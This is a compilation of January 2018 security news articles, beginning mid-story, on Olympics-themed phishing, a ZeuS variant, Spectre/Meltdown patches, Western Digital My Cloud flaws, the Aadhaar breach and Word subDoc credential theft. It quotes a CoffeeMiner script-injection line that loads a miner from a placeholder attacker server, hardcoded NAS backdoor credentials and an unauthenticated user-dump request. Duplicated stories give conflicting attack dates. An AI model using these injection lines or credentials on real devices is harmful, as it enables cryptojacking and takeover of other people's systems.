Pyeongchang%20Olympic%20Games

The campaigns have begun on December 22, attackers used spoofed messages that pretend to come from South Korea’s National Counter-Terrorism Center.

The hackers spoofed the message to appear to be from info@nctc.go.kr, which is the National Counter-Terrorism Center (NCTC) in South Korea, the analysis revealed the email was sent from an address in Singapore and referred alleged antiterror drills in the region in preparation for the Olympic Games.

Attackers attempt to trick victims into opening a document in Korean titled “Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics.”

Initially, the malware was embedded into the malicious document as a hypertext application (HTA) file, then threat actors started hiding the malicious code in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. Researchers also noted that attackers wrote a custom PowerShell code to decode the hidden image and launch the malware.

“When we deobfuscate the control server URLs, the implant establishes a connection to the following site over SSL:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/login/process.php” continues the analysis.

“Based on our analysis, this implant establishes an encrypted channel to the attacker’s server, likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware.”

The experts expect more hacking campaigns targeting entities involved in sporting events like Pyeongchang Olympic Games.

“With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes,” the McAfee report concluded.

“In similar past cases, the victims were targeted for their passwords and financial information.”


US National Security Agency Director Admiral Mike Rogers to Retire
8.1.2017 securityaffairs BigBrothers

After a four-year term, the National Security Agency Director Admiral Mike Rogers plans to retire, he sent a letter to its staff on Friday informing them that he would depart next spring.
After a four-year term, the National Security Agency chief Admiral Mike Rogers plans to retire within months.

The Admiral Mike Rogers was chosen by President Barack Obama in 2014 when he replaced Gen. Keith Alexander. He was nominated for his significant experience in the cybersecurity field, he was involved in cyber defense and offense policy issues as head of the Fleet Cyber Command.

Admiral%20Mike%20Rogers

The news was confirmed by US intelligence sources, the Admiral Mike Rogers who also led the US Cyber Command sent a letter to its staff on Friday informing them that he would depart next spring.

The Rogers’s successor will be nominated by President Donald Trump this month.

Rogers is in opposition to Trump, The Observer reported recently that he has admitted in a private town-hall-style meeting of NSA staffing that Donald Trump did, in fact, collude with the Russians.

Rogers along with other US security chiefs presented a report to Trump on January 6, 2017 saying that Russians had interfered in the 2016 presidential election.

Unfortunately, during his management of the management the agency faced the clamorous and disconcerting leak of its exploits and hacking tools from its arsenal.


Experts found a strain of the Zeus banking Trojan spread through a legitimate developer’s website
8.1.2017 securityaffairs
Virus

Malware researchers at Talos group have discovered a strain of Zeus banking Trojan that abuses the legitimate website of the Ukraine-based accounting software developer Crystal Finance Millennium (CFM).
The experts discovered that the version of the ZeuS banking Trojan used in this attack is the 2.0.8.9 that was leaked in 2011.

The attack occurred in August 2017, during the time frame associated with the observance of the Independence Day holiday in Ukraine, but researchers from Talos disclosed details of the attack online now.

Experts found many similarities with the attack vector used in the NotPetya case, hackers. While in the NotPetya attack hackers compromised the supply chain of the software fir M.E.Doc to distribute the malware, in the case of the Zeus banking Trojan threat actors relied on accounting software maker CFM’s website being used to distribute malware fetched by downloaders delivered as attachments in an email spam campaign.

Researchers from Talos were able to register and sinkhole one of the Command and Control (C2) domains used by the attackers, in this way they were able to gather information about the number and the nature of the infected systems.

Attackers used spam emails with a ZIP archive containing a JavaScript file, which was used a downloader. The researchers discovered that one of the domains used to host the malware payload was associated with CFM’s website, attackers used it also to distribute PSCrypt ransomware.

The analysis of the infection process revealed that once executed the malware would first perform a long list of anti-VM checks to determine whether it runs in a virtualized environment. If not, the malicious code achieves persistence by creating a registry entry to ensure execution at system startup.

Then the malware attempts to connect to several C&C servers and experts from Talos discovered that one of them was not registered at the time of the analysis … a gift for the researchers that used it to sinkhole the botnet.

Most of the infected systems were located in Ukraine, followed by the United States.

“Interestingly, most of the systems which beaconed to our sinkhole server were located in Ukraine with United States being the second most affected region. A graph showing the ISPs that were most heavily affected is below:”

Zeus%20Banking%20Trojan%20attacks

“As can be seen in the graph above, PJSC Ukrtelecom was by far the most heavily affected. This ISP is the company governed by the Ministry of Transportation and Communications in Ukraine. In total, our sinkhole logged 11,925,626 beacons from 3,165 unique IP address” states the analysis from Talos.

According to Talos hackers are refining their attack techniques and are increasingly attempting to abuse the trust relationship between organizations and their trusted software manufacturers.


Qualcomm Working on Mitigations for Spectre, Meltdown
8.1.2018 securityweek
Vulnerebility
Qualcomm has confirmed that some of its products are affected by the recently disclosed Spectre and Meltdown vulnerabilities, but the company says mitigations are being deployed.

The chipmaker has provided few details, but claims it has been working with ARM and others to assess the impact of the flaws. Mitigations have been developed and Qualcomm is in the process of incorporating them into impacted products.

“We are in the process of deploying these mitigations to our customers and encourage people to update their devices when patches become available,” the company stated.

Qualcomm’s processors, used in devices from several major vendors, include CPU, GPU, modem, audio, and camera components. Some of the systems rely on ARM CPU cores that have been confirmed to be affected by the Spectre (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754) vulnerabilities.

For example, the Snapdragon 653, 652 and 650 platforms use ARM Cortex-A72 processors, which ARM says are vulnerable to both Spectre exploits and a variant of the Meltdown attack. Moreover, the Snapdragon 845 mobile platform, which Qualcomm unveiled just a few weeks ago, uses a customized version of the Cortex-A75, which is also vulnerable to both Spectre and Meltdown attacks.

Qualcomm is not the only vendor using ARM technology in its products. Apple, whose A-series system-on-a-chip (SoC) also uses ARM processing cores, confirmed that some of its devices are affected.

Raspberry Pis also use ARM cores, but the Raspberry Pi Foundation announced that the models found in its devices – specifically ARM1176, Cortex-A7, and Cortex-A53 – are not impacted by Spectre or Meltdown.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data, including passwords, photos, documents, emails, and data from instant messaging apps.

Billions of devices using Intel, AMD and ARM processors are affected and researchers believe attacks are not easy to detect. Experts are concerned that we may soon witness remote attacks.

Attacks can be prevented using kernel page table isolation (KPTI) and a mitigation named Retpoline developed by researchers at Google. Intel, Apple, Microsoft, Google, Amazon and others have already started rolling out patches and workarounds.

However, the mitigations can introduce performance penalties of up to 30 percent for affected processors. While Intel said regular users should not notice any difference and several tech giants claimed they had not seen any meaningful performance impact, some AWS customers have reported problems, and tests conducted by Red Hat showed penalties of up to 19% in the case of operations involving highly cached random memory.


ZeuS Variant Abuses Legitimate Developer’s Website
8.1.2018 securityweek
Virus
The official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM) was abused for the distribution of a variant of the ZeuS banking Trojan, Talos reports.

The vector is similar to that used in the NotPetya attack in the summer of 2017, when a malicious actor abused the update server of tax software company M.E.Doc to distribute the destructive wiper.

Unlike the NotPetya attack, however, the distribution the ZeuS variant didn’t leverage a compromised server. Instead, the attack relied on accounting software maker CFM's website being used to distribute malware fetched by downloaders delivered as attachments in an email spam campaign.

The attack happened in August 2016, when information on the malware infection process were made public. Now, Talos has decided to share details on the scope of the attack and associated victims, including the geographic regions affected, based on information the company gathered after it managed to sinkhole command and control (C&C) domains.

The spam emails used in this attack contained a ZIP archive with a JavaScript file inside, which acted as a downloader. One of the domains used to host the malware payload was associated with CFM's website, which has been also observed distributing PSCrypt ransomware, the researchers say.

The malware used in this attack reused code from the version 2.0.8.9 of the ZeuS banking Trojan, which was leaked in 2011 and already spawned numerous other threats.

The malware would first check whether it runs in a virtualized sandbox environment and would enter an infinite sleep function if virtualization was detected. If not, it would then move to achieve persistence by creating a registry entry to ensure execution at system startup.

After infection, the malware attempts to connect to different C&C servers, one of which hadn’t been registered when Talos first started investigating the attack. The researchers then registered the domain, which provided them with insight into the malware’s C&C communications.

Talos discovered that most of the systems beaconing to the sinkhole server were located in Ukraine, with the United States emerging as the second most affected country. They also found out that PJSC Ukrtelecom, a company governed by the Ministry of Transportation and Communications in Ukraine, was the most affected ISP.

A total of 11,925,626 beacons from 3,165 unique IP addresses were logged by the sinkhole server, the researchers reveal.

“Attackers are increasingly attempting to abuse the trust relationship between organizations and their trusted software manufacturers as a means of obtaining a foothold within the environments they are targeting. As organizations deploy more effective security controls to protect their network environments attackers are continuing to refine their methodologies,” Talos concluded.


US National Security Agency Chief to Retire
8.1.2018 securityweek BigBrothers
National Security Agency Director Admiral Mike Rogers, the US signals intelligence czar, plans to retire within months after a four-year term scarred by damaging leaks, US intelligence sources confirmed Friday.

Rogers, who has led the NSA and its sister agency, the US Cyber Command, for four years, told staff in an internal letter Friday that he would depart in the spring, with his replacement to be nominated by President Donald Trump this month.

Named to the position in April 2014 by President Barack Obama, Rogers, 58, has almost completed one year under Trump, who has repeatedly delivered withering criticism of the US intelligence community.

Rogers was one of the four US security chiefs who presented a damning report to Trump on January 6, 2017 saying that Russians had interfered in the 2016 presidential election to boost his candidacy.

Trump has ever since refused to concede that conclusion, and Rogers is the only official who attended the meeting who kept his job through Trump's first year.

Besides keeping up US electronic spying, he has also spearheaded the country's ability to conduct offensive cyber operations, via the Cyber Command, a Pentagon unit.

And he has struggled to deal with the leak of ultra-secret NSA hacking tools, some of which are believed to have fallen into the hands of Russians.

Two former NSA hackers have agreed to plead guilty in recent months to charges of removing classified NSA materials to their homes, but neither has been accused of deliberate leaks.

According to a Washington Post report earlier this week, the NSA's 21,000-strong staff is facing a rapid turnover due to unhappiness with a Rogers-led reorganization and poor pay compared to the private sector.


NSA Contractor Pleads Guilty in Embarrassing Leak Case
8.1.2018 securityweek BigBrothers
A former contractor for the US National Security Agency's elite hacking group has agreed to plead guilty to removing classified documents in a case that highlighted a series of disastrous leaks of top-secret NSA materials.

Harold Martin, who reportedly worked for an NSA unit focused on hacking into target computer systems around the world, will plead guilty to one of 20 counts against him with the aim of concluding a 15-month-old case couched in deep secrecy, according to court documents filed late Wednesday.

The indictment filed on February 8, 2017 accused Martin of hoarding an estimated 50 terabytes of NSA data and documents in his home and car over a 20-year period. The material reportedly included sensitive digital tools for hacking foreign governments' computers.

His arrest in late 2016 followed the NSA's discovery that a batch of its hacking tools had fallen into the hands of a still-mysterious group called the Shadow Brokers, which offered them for sale online and also released some for free.

At least publicly, Martin has not been accused of responsibility for any NSA leaks.

In December, Nghia Hoang Pho, 67, a 10-year veteran of the NSA's Tailored Access Operations hacking unit, was charged with and agreed to plead guilty to one count of removing and retaining top-secret documents from the agency.

Vietnam-born Pho also had taken home highly classified NSA materials and programs.

According to The New York Times, apparent Russian hackers broke into his personal computer to steal the files, accessing them via Pho's use of Kaspersky software.

But that case also has not been linked to the Shadow Brokers theft.

Those leaks, and others from the Central Intelligence Agency, have hobbled the US spy agencies' abilities to hack into the computer systems of foreign governments and other espionage targets, according to intelligence experts.

Martin will officially submit his plea on January 22, according to court filings. He faces up to 10 years in jail and a maximum fine of $250,000.

Sentencing won't take place until the 19 other charges are resolved -- an indication that the government, while entertaining his single-count plea, is not completely satisfied that Martin's actions were harmless.


Hackers Already Targeting Pyeongchang Olympics: Researchers
7.1.2018 securityweek Hacking
Hackers have already begun targeting the Pyeongchang Olympic Games with malware-infected emails which may be aimed at stealing passwords or financial information, researchers said Saturday.

The security firm McAfee said in a report that several organizations associated with the Olympics had received the malicious email with the primary target being groups affiliated with ice hockey.

"The majority of these organizations (targeted) had some association with the Olympics, either in providing infrastructure or in a supporting role," the McAfee report said. "The attackers appear to be casting a wide net with this campaign."

In the attacks, which began as early as December 22, emails were "spoofed" to make them appear to come from South Korea's National Counter-Terrorism Center, which was in the process of conducting antiterror drills in the region in preparation for the Games.

McAfee said the emails came in fact from an address in Singapore, and instructed the readers to open a text document in Korean.

The document was titled "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics," according to the report.

The malware in some cases was hidden in text, and later in an image -- a technique known as steganography, according to McAfee.

"Based on our analysis, this implant establishes an encrypted channel to the attacker's server, likely giving the attacker the ability to execute commands on the victim's machine and to install additional malware," McAfee said.

McAfee said it expects more attacks of this nature, echoing warnings last year from University of California researchers of increasing targeting of sporting events.

"With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes," the McAfee report said.

"In similar past cases, the victims were targeted for their passwords and financial information."


A new stack-based overflow vulnerability discovered in AMD CPUs
7.1.2018 securityaffairs
Vulnerebility

Google expert discovered a new stack-based overflow vulnerability in AMD CPUs that could be exploited via crafted EK certificates,
Chip manufacturers are in the tempest, while media are continues sharing news about the Meltdown and Spectre attacks, the security researcher at Google’s cloud security team Cfir Cohen disclosed a stack-based overflow vulnerability in the fTMP of AMD’s Platform Security Processor (PSP).

The vulnerability affects 64-bit x86 processors, the AMD PSP provides administrative functions similar to the Intel Management Engine.

The fTMP is the firmware implementation of the Trusted Platform Module that is an international standard for a secure cryptoprocessor, The TPM is a dedicated microcontroller designed to secure hardware by integrating cryptographic keys into devices.

Cohen revealed that he reported the vulnerability to AMD in September, the manufacturer apparently had developed a patch by December 7. After the 90-day disclosure window, Google decided to publicly disclose the details of the vulnerability because AMD did not take any action to solve the problem.

“Through manual static analysis, we’ve found a stack-based overflow in the function EkCheckCurrentCert. This function is called from TPM2_CreatePrimary with user controlled data – a DER encoded [6] endorsement key (EK) certificate stored in the NV storage. A TLV (type-length-value) structure is parsed and copied on to the parent stack frame. Unfortunately, there are missing bounds checks, and a specially crafted certificate can lead to a stack overflow:” reads the security advisory.

“A firmware update emerged for some AMD chips in mid-December, with an option to at least partially disable the PSP. However, a spokesperson for the tech giant said on Friday this week that the above fTMP issue will be addressed in an update due out this month, January 2018.”

Cohen explained that missing bounds checks while managing a TLV (type-length-value) structure are the root cause of a stack overflow.

The vulnerability requests the physical access as a prerequisite, the expert noted that the PSP doesn’t implement common exploit mitigation techniques such as stack cookies, No-eXecute stack, or ASLR.

amd

The flaw is very hard to exploit as confirmed by an AMD spokesperson to The Register.

“an attacker would first have to gain access to the motherboard and then modify SPI-Flash before the issue could be exploited. But given those conditions, the attacker would have access to the information protected by the TPM, such as cryptographic keys.” said the AMD spokesperson.

AMD plans to address the vulnerability for a limited number of firmware versions, the security updates will be available later this month.


Cisco is going to release security patches for Meltdown and Spectre attacks
7.1.2018 securityaffairs
Vulnerebility

Cisco is going to release security patches for Meltdown and Spectre attacks, the company is currently investigating its entire products portfolio.
Cisco published a security advisory on the CPU Side-Channel information disclosure vulnerabilities that are exploited in the Spectre and Meltdown attacks and announced it is going to release security updates to protect its customers.

Switchzilla announced it will release software updates that address these flaws.

In a statement, Cisco highlighted that the majority of its products are closed systems, this means that it is impossible for an attacker to run custom code on the device. However, the company confirmed that the underlying CPU and OS combination in some products could open the devices to the attacks.

“The first two vulnerabilities, CVE-2017-5753 and CVE-2017-5715, are collectively known as Spectre, the third vulnerability, CVE-2017-5754, is known as Meltdown. The vulnerabilities are all variants of the same attack and differ in the way the speculative execution is exploited.” reads the advisory published by CISCO.
“In order to exploit any of these vulnerabilities, an attacker must be able to run crafted code on an affected device. Although, the underlying CPU and OS combination in a product may be affected by these vulnerabilities, the majority of Cisco products are closed systems that do not allow customers to run custom code on the device, and thus are not vulnerable.”

According to Cisco, only devices that allow the customer to execute their customized code side-by-side with the Cisco code on the same microprocessor are at risk.

Let’s consider for example the case of a Cisco product running on a virtualized environment, if the virtual machine is vulnerable the overall system is exposed to the attacks.

“A Cisco product that may be deployed as a virtual machine or a container, even while not being directly affected by any of these vulnerabilities, could be targeted by such attacks if the hosting environment is vulnerable.” continues the advisory.

“Cisco recommends customers harden their virtual environment and to ensure that all security updates are installed.”

The company is currently investigating its product portfolio searching for vulnerable devices.


CoffeeMiner – Hacking WiFi networks to mine cryptocurrencies
7.1.2018 securityaffairs Hacking

A developer published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks and mine cryptocurrencies.
The spike in the values of Bitcoin is attracting the interest of crooks that are adopting any method to steal crypto wallets or computational resources from the victims.

A developer named Arnau has published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks to inject crypto-mining code into connected browsing sessions, an ingenious method to rapidly monetize illegal efforts.

The experts explained that his project was inspired by the Starbucks case where hackers hijacked laptops connected to the WiFi network to use the devices computing power to mine cryptocurrency.

Arnau explained how to power a MITM (Man(Person)-In-The-Middle) attack to inject some javascript in the html pages accessed by the connected users, in this way all the devices connected to a WiFi network are forced to be mine a cryptocurrency.

The CoffeeMiner works by spoofing Address Resolution Protocol (ARP) messages on a local area network in order to intercept unencrypted traffic from other devices on the network.

The MiTM attack is conducted by using software called mitmproxy that allows to inject the following line of HTML code into unencrypted traffic related to the content requested by other users on the networks:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>
“mitmproxy is a software tool that allows us to analyze the traffic that goes through a host, and allows to edit that traffic. In our case, we will use it to inject the javascript into the html pages.” wrote Arnau.

“To make the process more more clean, we will only inject one line of code into the html pages. And will be that line of html code that will call to the javascript cryptocurrency miner.”

When the user’s browser loads the pages with the injected code it runs the JavaScript and abuses CPU time to generate Monero using CoinHive‘s crypto-mining software.

Arnau set up VirtualBox machine to demonstrate the attack, and also published a couple of PoC video for the attack in a virtualized environment and in a real world WiFi network:

 

The CoffeeMiner version published by the researcher doesn’t work with HTTPS, but the limitation could be bypassed by addition sslstrip.

“Another further feature, could be adding sslstrip, to make sure the injection also in the websites that the user can request over HTTPS.” concluded the researcher.

Arnau published the code of the CoffeeMiner project on GitHub.


Critical Unpatched Flaws Disclosed In Western Digital 'My Cloud' Storage Devices
6.1.2018 thehackernews
Vulnerebility

Security researchers have discovered several severe vulnerabilities and a secret hard-coded backdoor in Western Digital's My Cloud NAS devices that could allow remote attackers to gain unrestricted root access to the device.
Western Digital's My Cloud (WDMyCloud) is one of the most popular network-attached storage devices which is being used by individuals and businesses to host their files, and automatically backup and sync them with various cloud and web-based services.
The device lets users not only share files in a home network, but the private cloud feature also allows them to access their data from anywhere at any time.
Since these devices have been designed to be connected over the Internet, the hardcoded backdoor would leave user data open to hackers.
GulfTech research and development team has recently published an advisory detailing a hardcoded backdoor and several vulnerabilities it found in WD My Cloud storage devices that could allow remote attackers to inject their own commands and upload and download sensitive files without permission.
Noteworthy, James Bercegay of GulfTech contacted the vendor and reported the issues in June last year. The vendor confirmed the vulnerabilities and requested a period of 90 days until full disclosure.
On 3rd January (that's almost after 180 days), GulfTech publicly disclosed the details of the vulnerabilities, which are still unpatched.
Unrestricted File Upload Flaw Leads to Remote Exploitation
As the name suggests, this vulnerability allows a remote attacker to upload an arbitrary file to the server running on the internet-connected vulnerable storage devices.
The vulnerability resides in "multi_uploadify.php" script due to the wrong implementation of gethostbyaddr() PHP function by the developers.
This vulnerability can also be easily exploited to gain a remote shell as root. For this, all an attacker has to do is send a post request containing a file to upload using the parameter Filedata[0]—a location for the file to be uploaded to which is specified within the "folder" parameter, and a fake "Host" header.
The researcher has also written a Metasploit module to exploit this vulnerability.
"The [metasploit] module will use this vulnerability to upload a PHP webshell to the "/var/www/" directory. Once uploaded, the webshell can be executed by requesting a URI pointing to the backdoor, and thus triggering the payload," the researcher writes.
Hard Coded Backdoor Leads to Remote Exploitation
Researchers also found the existence of a "classic backdoor"—with admin username "mydlinkBRionyg" and password "abc12345cba," which is hardcoded into the binary and cannot be changed.
So, anyone can just log into WD My Cloud devices with these credentials.
Also, using this backdoor access, anyone can access the buggy code which is vulnerable to command injection and spawn a root shell.
"The triviality of exploiting this issues makes it very dangerous, and even wormable," the researcher notes. "Not only that, but users locked to a LAN are not safe either."
"An attacker could literally take over your WDMyCloud by just having you visit a website where an embedded iframe or img tag make a request to the vulnerable device using one of the many predictable default hostnames for the WDMyCloud such as 'wdmycloud' and 'wdmycloudmirror' etc."
Other Vulnerabilities in Western Digital's My Cloud
Besides these two above-mentioned critical vulnerabilities, researchers also reported some other below-explained important flaws:
Cross-site request forgery:
Due to no real XSRF protection within the WD My Cloud web interface, any malicious site can potentially make a victim's web browser connect to a My Cloud device on the network and compromise it.
Simply visiting a booby-trapped website would be enough to lose control of your My Cloud device.
Command injection:
In March last year, a member of the Exploitee.rs team discovered several command injection issues within the WD My Cloud devices, which can be combined with the XSRF flaw to gain complete control (root access) of the affected device.
Unfortunately, the GulfTech team also uncovered a few command injection flaws.
Denial of Service:
Researchers also found that since any unauthenticated user can set the global language preferences for the entire storage device and all of its users, it is possible for an attacker to abuse this functionality to cause a DoS condition to the web interface.
Information disclosure:
According to researchers, it is possible for an attacker to dump a list of all users, including detailed user information without requiring any authentication, by simply making use of a simple request to the web server like this: GET /api/2.1/rest/users? HTTP/1.1
Affected My Cloud Firmware Versions and Models
Western Digital's My Cloud and My Cloud Mirror firmware version 2.30.165 and earlier are affected by all above-reported vulnerabilities.
Affected device models include My Cloud Gen 2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2, My Cloud EX4, My Cloud EX2100, My Cloud EX4100, My Cloud DL2100 and My Cloud DL4100.
Metasploit modules for all the vulnerabilities have been released online.


Data breach of the Aadhaar biometric system poses a serious risk for 1 Billion Indian residents
6.1.2018 securityaffairs Incindent

The Tribune announced to have “purchased” a service that provided it an unrestricted access to the residents’ records in the Aadhaar system.
According to The Tribune, hackers have breached the Unique Identification Authority of India’s Aadhaar biometric system and gained access to personally identifiable information (i.e. names, addresses, phone numbers) of more than 1 billion Indian residents.
The Tribune announced to have “purchased” a service being offered by anonymous sellers over WhatsApp that provided it an unrestricted access to details for any individual whose data are stored in the Aadhaar system.
Attackers offered a portal to access Indian citizen data by knowing the Aadhaar user’s ID number. The service allowed the journalist to retrieve the resident’s name, address, postal code, photo, phone number, and email address, by providing the Aadhaar ID.

The hackers are offering the access to the portal for 500 rupees and are charging an additional 300 rupees for an application that allows printing a Aadhaar card.

“Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far.” states The Tribune.

“It took just Rs 500, paid through Paytm, and 10 minutes in which an “agent” of the group running the racket created a “gateway” for this correspondent and gave a login ID and password. Lo and behold, you could enter any Aadhaar number in the portal, and instantly get all particulars that an individual may have submitted to the UIDAI (Unique Identification Authority of India), including name, address, postal code (PIN), photo, phone number and email.”

The Unique Identification Authority of India denies that Aadhaar system has been breached, but The Tribune revealed that when contacted, UIDAI officials in Chandigarh expressed shock over the full data being accessed, and admitted it seemed to be a major national security breach.

“Except the Director-General and I, no third person in Punjab should have a login access to our official portal. Anyone else having access is illegal, and is a major national security breach.” Sanjay Jindal, Additional Director-General, UIDAI Regional Centre, Chandigarh told The Tribune.

Aadhaar%20system

According to the investigation conducted by The Tribune, the breach could have involved lakh village-level enterprise (VLE) operators hired by the Ministry of Electronics and Information Technology (ME&IT) under the Common Service Centres Scheme (CSCS) across India, offering them access to UIDAI data.

CSCS operators were initially tasked with making Aadhaar cards across India, but later this function was restricted to post offices and designated banks.

More than one lakh VLEs are now suspected to have gained this illegal access to UIDAI data to provide “Aadhaar services” to common people for a charge, including the printing of Aadhaar cards.


Intel releases patches to mitigate Meltdown and Spectre attacks
6.1.2018 securityaffairs
Vulnerebility

Meltdown and Spectre attacks – According to Intel, by the end of the next week, the company will have issued security patches for more than 90% of chips commercialized in the past 5 years.
White hat hackers from Google Project Zero this week disclosed the details of Meltdown and Spectre attacks targeting CPUs from major manufacturers, including Intel, AMD, and ARM.

The expert devised two attacks dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

To protect systems from bot Meltdown and Spectre attacks it is possible to implement the hardening technique known as kernel page table isolation (KPTI). The technique allows isolating kernel space from user space memory.

Intel confirmed that system manufacturers have been provided firmware and software updates that neutralize both Meltdown and Spectre attacks for chips launched in the last five years.

Customers have to wait that system manufacturers will distribute the security patches for their affected products.

According to Intel, by the end of the next week, the company will have issued security patches for more than 90% of chips commercialized in the past 5 years.

“Intel has developed and is rapidly issuing updates for all types of Intel-based computer systems — including personal computers and servers — that render those systems immune from both exploits (referred to as “Spectre” and “Meltdown”) reported by Google Project Zero.” reads the press release published by Intel.

“Intel has already issued updates for the majority of processor products introduced within the past five years. By the end of next week, Intel expects to have issued updates for more than 90 percent of processor products introduced within the past five years.”

intel chip

Experts speculate security patches could have a significant effect on the performance of the affected products, but Intel pointed out that average users will not notice any difference.

“Intel continues to believe that the performance impact of these updates is highly workload-dependent and, for the average computer user, should not be significant and will be mitigated over time.” continues Intel.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact.”

Intel confirmed that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess any impact on system performance from security updates did not reveal negative effects.

Researchers from Google Project Zero proposed as mitigation strategy a technique named Retpoline.

“In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” — a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.” wrote Google.
“In addition, we have deployed Kernel Page Table Isolation (KPTI) — a general purpose technique for better protecting sensitive information in memory from other software running on a machine — to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.”


Microsoft Word subDoc Feature Allows Password Theft
5.1.2018 securityweek Hacking
A feature in Microsoft Word that allows for the loading of sub-documents from a master document can be abused by attackers to steal a user’s credentials, according to Rhino Security Labs.

Dubbed subDoc, the feature was designed to load a document into the body of another document, so as to include information from one document into the other, while also allowing for the information to be edited and viewed on its own.

According to Rhino Security, the feature can also be used to load remote (Internet-hosted) subDoc files into the host document, thus allowing for malicious abuse in certain situations.

The feature, Rhino's researchers explain, is similar to attachedTemplate, another Office feature that can be abused by attackers for malicious purposes. The method allows the creation of malicious documents that would open an authentication prompt in the Windows style once the intended victim opens them, thus enabling the attacker to harvest credentials remotely.

“We determined, after testing in our sandbox environment, that abusing the subDoc method would allow us to do the same thing as the attachedTemplate method,” Rhino Security’s Hector Monsegur explains.

The researcher also points out that some organizations are not filtering egress SMB requests, meaning that they would leak the NTLMv2 (session protocol) hash in the initial SMB request.

To exploit the feature, Rhino Security created a document opening a subDoc external resource using a Universal Naming Convention (UNC) path (a means of connecting to servers and workstations without specifying a drive) that points to a destination they would control.

This allowed them to load the Responder to listen for incoming SMB requests and collect the NTLMv2 hashes. Available on GitHub, Responder is a LLMNR, NBT-NS and MDNS poisoner designed to answer to File Server Service request, which is for SMB, and remain stealthy on the network.

“The attack process for this would be to send a tainted document out to several targets while running Responder server on associated C&C server. After targets open the document, we intercept the respective hashes, crack them using hashcat and use our newly found credentials for lateral movement across the target network,” Monsegur explains.

When the document is opened, subDoc automatically attempts to load and provides the user with a link instead of the would-be document. However, user interaction with the link isn’t required for the payload to execute, the researcher says. The link can also be hidden from the user, so that they wouldn’t detect the malicious intent.

The attack, the researcher points out, isn’t detected by popular anti-virus companies, mainly because the subDoc feature hasn’t been recognized publicly as an attack vector for malicious actions.

The security researcher also published an open source tool designed to generate a Word subDoc for a user-defined URL and also to integrate it into a user-specified ‘parent’ Word doc. Dubbed Subdoc Injector, the tool is available on GitHub.

“Office has a myriad of loosely-documented features that have yet to be explored. As more research goes into these functions, more vulnerabilities and abusable functions will likely be discovered, making the situation difficult for defenders to protect their systems,” Monsegur notes.


Industrial Firms Increasingly Hit With Targeted Attacks: Survey
5.1.2018 securityweek
Attack
An increasing number of companies in the industrial sector have experienced a targeted attack, according to a survey conducted by Kaspersky Lab and B2B International.

As part of its 2017 IT Security Risks Survey, Kaspersky talked to more than 5,200 representatives of small, medium and large businesses in 29 countries about IT security and the incidents they deal with.

Of the 962 industrial companies surveyed, 28% said they had faced a targeted attack in the last 12 months. This represents an 8 percentage point increase compared to the previous year.

“The fact that the most dangerous incident type has grown by more than a third strongly suggests that cybercriminal groups are paying much closer attention to the industrial sector,” Kaspersky said.

More than half of industrial organization surveyed by Kaspersky reported being hit by malware attacks in the last year.

Industrial%20sector%20attacks

A majority of industrial sector respondents claimed that the security incidents they experienced were complex, and nearly half admitted that there is insufficient insight into the threats they face.

Roughly one-third of companies reported that it had taken them several days to detect an incident, while 20% said it had taken them several weeks.

While 62% believe sophisticated security software is necessary to address potential threats, almost half of respondents also noted that staff has not followed IT security policies. The number of people who blamed staff in the industrial sector is 6% higher compared to other sectors that took part in Kaspersky’s survey.

“Cyberattacks on industrial control systems have become the indisputable number-one concern. The good news is that the majority of industrial market players know which threats are coming to the fore today and will be relevant in the near future,” explained Andrey Suvorov, Head of Critical Infrastructure Protection Business Development at Kaspersky.

“That’s why it’s crucially important to implement a complex security solution that’s specifically designed to protect automated industrial environments, is highly flexible and configured in accordance with the technological processes of each organisation.”


Inside McAfee's Acquisition of Skyhigh Networks
5.1.2018 securityweek IT
McAfee Completes Acquisition of Skyhigh Networks

On Jan. 3, McAfee completed the acquisition of Skyhigh Networks that was announced in November 2017. McAfee itself was spun out of Intel in April 2017 with the express purpose of becoming one of the world's largest pure play cybersecurity firms. The purchase of Skyhigh, a cloud access security broker (CASB), now allows McAfee to offer an integrated security solution from endpoint across networks and into the cloud.

"Today's news marks a new milestone for the future of our company in cloud," said Chris Young, McAfee's CEO. "With two industry leaders meeting under one company, we will make cybersecurity an enabler to the transformative power of our digital age. We are focused on securing customers from their devices to the cloud."

SecurityWeek talked to McAfee SVP and CTO Steve Grobman to understand the mechanics and purpose of this new, expanded, McAfee. "McAfee's strategy," he said, "is all about security from the device to the cloud, and supporting organizational defense with all the information that comes from both of those places. McAfee currently has a very strong set of technologies on the endpoint, on the devices -- but what the Skyhigh acquisition does is provide a very powerful control point in the cloud for a wide range of cloud security use cases."

McAfee LogoHe believes there are three exciting aspects to this purchase: being able to offer greater cloud visibility and control under the McAfee umbrella; the improved threat detection that will come from seeing both cloud and on-premise threats in context; and the continuing growth potential of CASBs in their own right.

